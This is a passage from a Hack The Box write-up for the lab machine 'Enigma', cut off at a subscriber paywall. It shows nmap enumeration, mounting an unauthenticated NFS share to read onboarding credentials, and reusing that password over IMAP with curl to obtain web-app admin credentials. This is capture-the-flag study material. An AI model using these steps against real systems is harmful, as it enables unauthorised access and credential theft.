{
"$type": "site.standard.document",
"bskyPostRef": {
"cid": "bafyreicmnarqwfm2g7dvpszgpgu5gjmpryg5onobedj4iidmeacp4r3epe",
"uri": "at://did:plc:gc2nrf5j5b2po5huoyw6utr4/app.bsky.feed.post/3mpdj4gal3es2"
},
"coverImage": {
"$type": "blob",
"ref": {
"$link": "bafkreid7zrijkyt7byz6tdubyqavebqp4jvprhzqt4a4ngdfloosgcemoe"
},
"mimeType": "image/jpeg",
"size": 87547
},
"description": "Placeholders used\n\n\n\n\n\n\nToken\nMeaning\n\n\n\n\n$TARGET\nthe target machine's IP\n\n\n$ATTACKER\nyour VPN (tun0) IP\n\n\n$LPORT\nyour reverse-shell listener port (e.g. 9001)\n\n\n[REDACTED]\nvalue intentionally removed\n\n\n\n\n\n\n\n0. SETUP & A NETWORK GOTCHA\n\nAdd the vhosts (discovered along the way: enigma.htb, mail001.enigma.htb,\nsupport_001.enigma.htb):\n\necho \"$TARGET enigma.htb mail001.enigma.htb support_001.enigma.htb\" | sudo tee -a /etc/hosts\n\n\nThis is the classic HTB tun0 MTU black-hole: large packets (TLS Cl...",
"path": "/hack-the-box-htb-enigma-writeup-easy-weekly-june-27th-2026/",
"publishedAt": "2026-06-28T08:02:22.000Z",
"site": "https://1337sheets.com",
"tags": [
"Subscribe now"
],
"textContent": "**Placeholders used**\n\nToken | Meaning\n---|---\n`$TARGET` | the target machine's IP\n`$ATTACKER` | your VPN (tun0) IP\n`$LPORT` | your reverse-shell listener port (e.g. 9001)\n`[REDACTED]` | value intentionally removed\n\n* * *\n\n## 0. Setup & a network gotcha\n\nAdd the vhosts (discovered along the way: `enigma.htb`, `mail001.enigma.htb`,\n`support_001.enigma.htb`):\n\n\n echo \"$TARGET enigma.htb mail001.enigma.htb support_001.enigma.htb\" | sudo tee -a /etc/hosts\n\n\nThis is the classic HTB tun0 **MTU black-hole** : large packets (TLS ClientHello\n\n * certificate) get dropped on the VPN. Fix by lowering the interface MTU:\n\n\n\n\n sudo ip link set dev tun0 mtu 1300\n\n\nAfter this, everything worked. If IMAP/HTTPS to a box hangs while plain TCP\nconnects, suspect MTU first.\n\n* * *\n\n## 1. Enumeration\n\n\n nmap -p- --min-rate 2000 -sV -sC $TARGET\n\n\nA mail-server-themed host:\n\n\n 22/tcp ssh (publickey only)\n 80/tcp http nginx (Ubuntu)\n 110/tcp pop3\n 111/tcp rpcbind\n 143/tcp imap\n 993/tcp imaps\n 995/tcp pop3s\n 2049/tcp nfs\n + high ports → mountd / nlockmgr / status (NFS machinery)\n\n\nReading the surface: a full **mail stack** (POP3/IMAP + TLS), **NFS/rpcbind**\n(always worth an anonymous check), and a web server. No SMTP exposed — mail is\ndelivered locally only.\n\n* * *\n\n## 2. NFS → onboarding credentials\n\n\n showmount -e $TARGET\n # Export list for $TARGET:\n # /srv/nfs/onboarding *\n\n\nThe `*` means it is exported to **everyone with no authentication**. Mount and\nread it:\n\n\n sudo mkdir -p /mnt/onboarding\n sudo mount -t nfs -o vers=3,nolock $TARGET:/srv/nfs/onboarding /mnt/onboarding\n ls -la /mnt/onboarding\n # -rw-r--r-- 1 root root 1751 ... New_Employee_Access.pdf\n\n\nThe PDF is an IT \"New Employee System Access\" sheet:\n\n\n Employee : Kevin Mitchell\n Webmail : http://mail001.enigma.htb\n Username : kevin\n Password : Enigma2024!\n\n\n* * *\n\n## 3. Webmail + password reuse → OpenSTAManager creds\n\nThe webmail (`mail001.enigma.htb`) is **Roundcube 1.6.16**. The version is leaked\nin the login page's inline JS (`rcversion: 10616` = `version2int(\"1.6.16\")`).\n1.6.16 is the _patched_ release — it fixes the whole 2026 Roundcube CVE batch —\nso chasing a Roundcube RCE is a **deliberate dead end**. The credentials are\nreal, though, and the onboarding password is a corporate default that is\n**reused**.\n\nDrive IMAP directly with `curl` (no web UI needed). First log in as **kevin** and\nlist his folders:\n\n\n curl -s --url \"imaps://$TARGET/\" --user \"kevin:Enigma2024!\" -k\n # * LIST (...) \"/\" Sent / Trash / INBOX\n\n\n**Where`sarah` comes from:** read kevin's inbox. His only message is a welcome\nemail **from`sarah@enigma.htb`** (\"I'm Sarah from the Accounts department…\"),\nwhich is how we learn a second user/mailbox exists:\n\n\n curl -s --url \"imaps://$TARGET/INBOX/;MAILINDEX=1\" --user \"kevin:Enigma2024!\" -k\n\n\n\n From : sarah@enigma.htb\n Subject : Welcome to Enigma Corp, Kevin!\n ...\n I'm Sarah from the Accounts department. I'll be your point of contact ...\n\n\nNow test the reused onboarding password against **sarah's** mailbox — it works:\n\n\n curl -s --url \"imaps://$TARGET/\" --user \"sarah:Enigma2024!\" -k\n # * LIST (...) \"/\" Trash / INBOX ← auth succeeds → password reuse confirmed\n\n\nRead sarah's inbox:\n\n\n curl -s --url \"imaps://$TARGET/INBOX/;MAILINDEX=1\" --user \"sarah:Enigma2024!\" -k\n\n\n\n Subject : Re: OpenSTAManager Access Request\n URL : http://support_001.enigma.htb\n Username : admin\n Password : Ne3s4rtars78s\n\n\nA **third vhost** and admin credentials for **OpenSTAManager** (an open-source\nmanagement / e-invoicing app). SSH is publickey-only, so reuse helps only on the\nmail service.\n\n### This post is for subscribers only\n\nBecome a member to get access to all content\n\nSubscribe now",
"title": "Hack The Box - HTB Enigma Writeup - Easy - Weekly - June 27th, 2026",
"updatedAt": "2026-06-28T08:02:23.099Z"
}